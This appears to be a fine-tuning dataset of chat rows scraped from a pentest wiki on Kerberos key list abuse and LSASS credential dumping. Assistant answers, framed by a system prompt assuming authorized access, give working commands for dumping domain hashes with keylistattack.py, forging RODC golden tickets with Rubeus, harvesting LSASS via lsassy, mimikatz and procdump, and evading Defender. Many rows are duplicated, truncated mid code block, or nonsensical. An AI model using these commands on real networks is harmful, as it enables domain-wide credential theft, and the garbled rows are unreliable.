to send a TGS-REQ to the KRBTGT service with a padata filed value of 161 (KERB-KEY-LIST-REQ). Knowing the KRBTGT key of the RODC is required here. The TGS-REP will contain the long term secret of the user in the KERB-KEY-LIST-REP key value."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Kerberos key list - Theory", "response": "It is possible to retrieve the long term secret of a user (e.g. NT hash) by sending a TGS-REQ (service ticket request) to the KRBTGT service with a KERB-KEY-LIST-REQ message type. This was introduced initially to support SSO with legacy protocols (e.g. NTLM) with Azure AD on on-premises resources.\n\nAn attacker can abuse this by forging a RODC golden ticket for a target user and use it to send a TGS-REQ to the KRBTGT service with a padata filed value of 161 (KERB-KEY-LIST-REQ). Knowing the KRBTGT key of the RODC is required here. The TGS-REP will contain the long term secret of the user in the KERB-KEY-LIST-REP key value.", "metadata": {"corpus_index": 311, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/kerberos-key-list.md", "page_title": "Kerberos key list", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Kerberos key list - Practice work?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the keylistattack.py tool (Python) can be used for this purpose.\n\n``bash\n#Attempt to dump all the users' hashes even the ones in the Denied list\n#Low privileged credentials are needed in the command for the SAMR enumeration\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" -full \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$RODC-server\"\n\n#Attempt to dump all the users' hashes but filter the ones in the Denied list\n#Low privileged credentials are needed in the command for the SAMR enumeration\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$RODC-server\"\n\n#Attempt to dump a specific user's hash\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" -t \"$TARGETUSER\" -kdc \"$RODC_FQDN\" LIST\n`\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used for this purpose. \n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Kerberos key list - Practice work?", "response": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the keylistattack.py tool (Python) can be used for this purpose.\n\n``bash\n#Attempt to dump all the users' hashes even the ones in the Denied list\n#Low privileged credentials are needed in the command for the SAMR enumeration\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" -full \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$RODC-server\"\n\n#Attempt to dump all the users' hashes but filter the ones in the Denied list\n#Low privileged credentials are needed in the command for the SAMR enumeration\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$RODC-server\"\n\n#Attempt to dump a specific user's hash\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" -t \"$TARGETUSER\" -kdc \"$RODC_FQDN\" LIST\n`\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used for this purpose. \n\n``powershell", "metadata": {"corpus_index": 312, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/kerberos-key-list.md", "page_title": "Kerberos key list", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Kerberos key list - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the keylistattack.py tool (Python) can be used for this purpose.\n\n``bash\n#Attempt to dump all the users' hashes even the ones in the Denied list\n#Low privileged credentials are needed in the command for the SAMR enumeration\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" -full \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$RODC-server\"\n\n#Attempt to dump all the users' hashes but filter the ones in the Denied list\n#Low privileged credentials are needed in the command for the SAMR enumeration\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$RODC-server\"\n\n#Attempt to dump a specific user's hash\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" -t \"$TARGETUSER\" -kdc \"$RODC_FQDN\" LIST\n`\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used for this purpose. \n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Kerberos key list - Practice", "response": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the keylistattack.py tool (Python) can be used for this purpose.\n\n``bash\n#Attempt to dump all the users' hashes even the ones in the Denied list\n#Low privileged credentials are needed in the command for the SAMR enumeration\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" -full \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$RODC-server\"\n\n#Attempt to dump all the users' hashes but filter the ones in the Denied list\n#Low privileged credentials are needed in the command for the SAMR enumeration\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$RODC-server\"\n\n#Attempt to dump a specific user's hash\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" -t \"$TARGETUSER\" -kdc \"$RODC_FQDN\" LIST\n`\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used for this purpose. \n\n``powershell", "metadata": {"corpus_index": 312, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/kerberos-key-list.md", "page_title": "Kerberos key list", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the Attempt syntax for kerberos key list - practice?"}, {"role": "assistant", "content": "#Attempt to dump all the users' hashes even the ones in the Denied list\n#Low privileged credentials are needed in the command for the SAMR enumeration\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" -full \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$RODC-server\"\n\n#Attempt to dump all the users' hashes but filter the ones in the Denied list\n#Low privileged credentials are needed in the command for the SAMR enumeration\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$RODC-server\"\n\n#Attempt to dump a specific user's hash\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" -t \"$TARGETUSER\" -kdc \"$RODC_FQDN\" LIST"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the Attempt syntax for kerberos key list - practice?", "response": "#Attempt to dump all the users' hashes even the ones in the Denied list\n#Low privileged credentials are needed in the command for the SAMR enumeration\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" -full \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$RODC-server\"\n\n#Attempt to dump all the users' hashes but filter the ones in the Denied list\n#Low privileged credentials are needed in the command for the SAMR enumeration\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$RODC-server\"\n\n#Attempt to dump a specific user's hash\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" -t \"$TARGETUSER\" -kdc \"$RODC_FQDN\" LIST", "metadata": {"corpus_index": 313, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/kerberos-key-list.md", "page_title": "Kerberos key list", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Attempt"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Kerberos key list - Practice"}, {"role": "assistant", "content": "#Attempt to dump all the users' hashes even the ones in the Denied list\n#Low privileged credentials are needed in the command for the SAMR enumeration\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" -full \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$RODC-server\"\n\n#Attempt to dump all the users' hashes but filter the ones in the Denied list\n#Low privileged credentials are needed in the command for the SAMR enumeration\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$RODC-server\"\n\n#Attempt to dump a specific user's hash\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" -t \"$TARGETUSER\" -kdc \"$RODC_FQDN\" LIST"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Kerberos key list - Practice", "response": "#Attempt to dump all the users' hashes even the ones in the Denied list\n#Low privileged credentials are needed in the command for the SAMR enumeration\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" -full \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$RODC-server\"\n\n#Attempt to dump all the users' hashes but filter the ones in the Denied list\n#Low privileged credentials are needed in the command for the SAMR enumeration\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$RODC-server\"\n\n#Attempt to dump a specific user's hash\nkeylistattack.py -rodcNo \"$KBRTGT_NUMBER\" -rodcKey \"$KRBTGT_AES_KEY\" -t \"$TARGETUSER\" -kdc \"$RODC_FQDN\" LIST", "metadata": {"corpus_index": 313, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/kerberos-key-list.md", "page_title": "Kerberos key list", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 1. Forge a RODC Golden ticket"}, {"role": "assistant", "content": "Rubeus.exe golden /rodcNumber:$KBRTGT_NUMBER /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:ticket.kirbi /aes256:$KRBTGT_AES_KEY /user:USER /id:USER_RID /domain:domain.local /sid:DOMAIN_SID"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 1. Forge a RODC Golden ticket", "response": "Rubeus.exe golden /rodcNumber:$KBRTGT_NUMBER /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:ticket.kirbi /aes256:$KRBTGT_AES_KEY /user:USER /id:USER_RID /domain:domain.local /sid:DOMAIN_SID", "metadata": {"corpus_index": 314, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/kerberos-key-list.md", "page_title": "Kerberos key list", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 1. Forge a RODC Golden ticket?"}, {"role": "assistant", "content": "Rubeus.exe golden /rodcNumber:$KBRTGT_NUMBER /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:ticket.kirbi /aes256:$KRBTGT_AES_KEY /user:USER /id:USER_RID /domain:domain.local /sid:DOMAIN_SID"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 1. Forge a RODC Golden ticket?", "response": "Rubeus.exe golden /rodcNumber:$KBRTGT_NUMBER /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:ticket.kirbi /aes256:$KRBTGT_AES_KEY /user:USER /id:USER_RID /domain:domain.local /sid:DOMAIN_SID", "metadata": {"corpus_index": 314, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/kerberos-key-list.md", "page_title": "Kerberos key list", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 2. Request a TGT via TGS-REQ request and retrieve the NT hash of the user in the response in the context of penetration testing"}, {"role": "assistant", "content": "Rubeus.exe asktgs /enctype:aes256 /keyList /ticket:ticket.kirbi /service:krbtgt/domain.local \n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 2. Request a TGT via TGS-REQ request and retrieve the NT hash of the user in the response in the context of penetration testing", "response": "Rubeus.exe asktgs /enctype:aes256 /keyList /ticket:ticket.kirbi /service:krbtgt/domain.local \n```\n\n:::", "metadata": {"corpus_index": 315, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/kerberos-key-list.md", "page_title": "Kerberos key list", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 2. Request a TGT via TGS-REQ request and retrieve the NT hash of the user in the response?"}, {"role": "assistant", "content": "Rubeus.exe asktgs /enctype:aes256 /keyList /ticket:ticket.kirbi /service:krbtgt/domain.local \n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 2. Request a TGT via TGS-REQ request and retrieve the NT hash of the user in the response?", "response": "Rubeus.exe asktgs /enctype:aes256 /keyList /ticket:ticket.kirbi /service:krbtgt/domain.local \n```\n\n:::", "metadata": {"corpus_index": 315, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/kerberos-key-list.md", "page_title": "Kerberos key list", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does LSASS secrets - Theory work?"}, {"role": "assistant", "content": "The Local Security Authority Subsystem Service (LSASS) is a Windows service responsible for enforcing the security policy on the system. It verifies users logging in, handles password changes and creates access tokens. Those operations lead to the storage of credential material in the process memory of LSASS. With administrative rights only, this material can be harvested (either locally or remotely)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does LSASS secrets - Theory work?", "response": "The Local Security Authority Subsystem Service (LSASS) is a Windows service responsible for enforcing the security policy on the system. It verifies users logging in, handles password changes and creates access tokens. Those operations lead to the storage of credential material in the process memory of LSASS. With administrative rights only, this material can be harvested (either locally or remotely).", "metadata": {"corpus_index": 316, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute LSASS secrets - Theory?"}, {"role": "assistant", "content": "The Local Security Authority Subsystem Service (LSASS) is a Windows service responsible for enforcing the security policy on the system. It verifies users logging in, handles password changes and creates access tokens. Those operations lead to the storage of credential material in the process memory of LSASS. With administrative rights only, this material can be harvested (either locally or remotely)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute LSASS secrets - Theory?", "response": "The Local Security Authority Subsystem Service (LSASS) is a Windows service responsible for enforcing the security policy on the system. It verifies users logging in, handles password changes and creates access tokens. Those operations lead to the storage of credential material in the process memory of LSASS. With administrative rights only, this material can be harvested (either locally or remotely).", "metadata": {"corpus_index": 316, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe LSASS secrets - Practice in the context of penetration testing"}, {"role": "assistant", "content": "::: tabs\n\n=== Lsassy\n\nLsassy (Python) can be used to remotely extract credentials, from LSASS, on multiple hosts. As of today (22/07/2020), it is the Rolls-Royce of remote lsass credential harvesting.\n\n* several dumping methods: comsvcs.dll, ProcDump, Dumpert\n* several authentication methods: like pass-the-hash (NTLM), or pass-the-ticket (Kerberos)\n* it can be used either as a standalone script, as a NetExec module or as a Python library\n* it can interact with a Neo4j database to set BloodHound targets as \"owned\"\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe LSASS secrets - Practice in the context of penetration testing", "response": "::: tabs\n\n=== Lsassy\n\nLsassy (Python) can be used to remotely extract credentials, from LSASS, on multiple hosts. As of today (22/07/2020), it is the Rolls-Royce of remote lsass credential harvesting.\n\n* several dumping methods: comsvcs.dll, ProcDump, Dumpert\n* several authentication methods: like pass-the-hash (NTLM), or pass-the-ticket (Kerberos)\n* it can be used either as a standalone script, as a NetExec module or as a Python library\n* it can interact with a Neo4j database to set BloodHound targets as \"owned\"\n\n```bash", "metadata": {"corpus_index": 317, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through LSASS secrets - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== Lsassy\n\nLsassy (Python) can be used to remotely extract credentials, from LSASS, on multiple hosts. As of today (22/07/2020), it is the Rolls-Royce of remote lsass credential harvesting.\n\n* several dumping methods: comsvcs.dll, ProcDump, Dumpert\n* several authentication methods: like pass-the-hash (NTLM), or pass-the-ticket (Kerberos)\n* it can be used either as a standalone script, as a NetExec module or as a Python library\n* it can interact with a Neo4j database to set BloodHound targets as \"owned\"\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through LSASS secrets - Practice", "response": "::: tabs\n\n=== Lsassy\n\nLsassy (Python) can be used to remotely extract credentials, from LSASS, on multiple hosts. As of today (22/07/2020), it is the Rolls-Royce of remote lsass credential harvesting.\n\n* several dumping methods: comsvcs.dll, ProcDump, Dumpert\n* several authentication methods: like pass-the-hash (NTLM), or pass-the-ticket (Kerberos)\n* it can be used either as a standalone script, as a NetExec module or as a Python library\n* it can interact with a Neo4j database to set BloodHound targets as \"owned\"\n\n```bash", "metadata": {"corpus_index": 317, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of netexec Module examples"}, {"role": "assistant", "content": "netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nnetexec smb $TARGETS -k -M lsassy\nnetexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\n``\n\n=== Mimikatz\n\nMimikatz can be used locally to extract credentials with sekurlsa::logonpasswords from lsass's process memory, or remotely with sekurlsa::minidump to analyze a memory dump (dumped with ProcDump for example).\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of netexec Module examples", "response": "netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nnetexec smb $TARGETS -k -M lsassy\nnetexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\n``\n\n=== Mimikatz\n\nMimikatz can be used locally to extract credentials with sekurlsa::logonpasswords from lsass's process memory, or remotely with sekurlsa::minidump to analyze a memory dump (dumped with ProcDump for example).\n\n``bash", "metadata": {"corpus_index": 318, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform netexec Module examples?"}, {"role": "assistant", "content": "netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nnetexec smb $TARGETS -k -M lsassy\nnetexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\n``\n\n=== Mimikatz\n\nMimikatz can be used locally to extract credentials with sekurlsa::logonpasswords from lsass's process memory, or remotely with sekurlsa::minidump to analyze a memory dump (dumped with ProcDump for example).\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform netexec Module examples?", "response": "netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nnetexec smb $TARGETS -k -M lsassy\nnetexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\n``\n\n=== Mimikatz\n\nMimikatz can be used locally to extract credentials with sekurlsa::logonpasswords from lsass's process memory, or remotely with sekurlsa::minidump to analyze a memory dump (dumped with ProcDump for example).\n\n``bash", "metadata": {"corpus_index": 318, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform netexec Module examples?"}, {"role": "assistant", "content": "=== Mimikatz\n\n[Mimikatz](https://github.com/gentilkiwi/mimikatz) can be used locally to extract credentials with [`sekurlsa::logonpasswords`](https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/logonpasswords) from lsass's process memory, or remotely with [`sekurlsa::minidump`](https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/minidump) to analyze a memory dump (dumped with [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) for example)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform netexec Module examples?", "response": "=== Mimikatz\n\n[Mimikatz](https://github.com/gentilkiwi/mimikatz) can be used locally to extract credentials with [`sekurlsa::logonpasswords`](https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/logonpasswords) from lsass's process memory, or remotely with [`sekurlsa::minidump`](https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/minidump) to analyze a memory dump (dumped with [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) for example).", "metadata": {"corpus_index": 319, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Mimikatz`?"}, {"role": "assistant", "content": "This command is used for netexec module examples. netexec Module examples"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Mimikatz`?", "response": "This command is used for netexec module examples. netexec Module examples", "metadata": {"corpus_index": 319, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain (Remotely) analyze a memory dump"}, {"role": "assistant", "content": "sekurlsa::minidump lsass.dmp\nsekurlsa::logonpasswords\n``\n\nFor Windows 2000, a special version of mimikatz called mimilove can be used.\n\n=== Pypykatz\n\nPypykatz (Python) can be used remotely (i.e. offline) to analyze a memory dump (dumped with ProcDump for example).\n\n`bash\npypykatz lsa minidump lsass.dmp\n`\n\n=== ProcDump\n\nThe legitimate tool ProcDump (from sysinternals) (download) can be used to dump lsass's process memory.\n\n`bash\nprocdump -accepteula -ma lsass lsass.dmp\n`\n\n> [!TIP]\n> Windows Defender is triggered when a memory dump of lsass is operated, quickly leading to the deletion of the dump. Using lsass's process identifier (pid) \"bypasses\" that.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain (Remotely) analyze a memory dump", "response": "sekurlsa::minidump lsass.dmp\nsekurlsa::logonpasswords\n``\n\nFor Windows 2000, a special version of mimikatz called mimilove can be used.\n\n=== Pypykatz\n\nPypykatz (Python) can be used remotely (i.e. offline) to analyze a memory dump (dumped with ProcDump for example).\n\n`bash\npypykatz lsa minidump lsass.dmp\n`\n\n=== ProcDump\n\nThe legitimate tool ProcDump (from sysinternals) (download) can be used to dump lsass's process memory.\n\n`bash\nprocdump -accepteula -ma lsass lsass.dmp\n`\n\n> [!TIP]\n> Windows Defender is triggered when a memory dump of lsass is operated, quickly leading to the deletion of the dump. Using lsass's process identifier (pid) \"bypasses\" that.\n\n``bash", "metadata": {"corpus_index": 320, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute (Remotely) analyze a memory dump?"}, {"role": "assistant", "content": 